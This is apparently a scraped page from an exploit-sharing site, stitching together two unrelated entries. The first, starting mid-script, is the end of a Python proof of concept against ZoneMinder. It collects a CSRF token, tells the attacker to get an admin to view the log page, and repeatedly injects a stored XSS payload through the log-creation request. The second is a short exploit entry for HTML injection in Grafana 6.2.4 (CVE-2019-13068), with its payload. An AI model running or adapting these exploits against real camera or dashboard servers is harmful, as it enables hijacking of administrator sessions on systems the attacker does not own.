Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log") while True: #XSS Request xssUrl = "http://"+options.ip+"/zm/index.php" xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession} xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"} xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"} response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData) print("Injecting payload: " + response.text) time.sleep(1)
HireHackking

Grafana <=6.2.4 - HTML Injection

HACKER · %s · %s

# Exploit Title: Grafana <=6.2.4 - HTML Injection # Date: 30-06-2019 # Exploit Author: SimranJeet Singh # Vendor Homepage: https://grafana.com/ # Software Link: https://grafana.com/grafana/download/6.2.4 # Version: 6.2.4 # CVE : CVE-2019-13068 The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field) Payload used - <img src="[image_URL]"><h1>Hello</h1>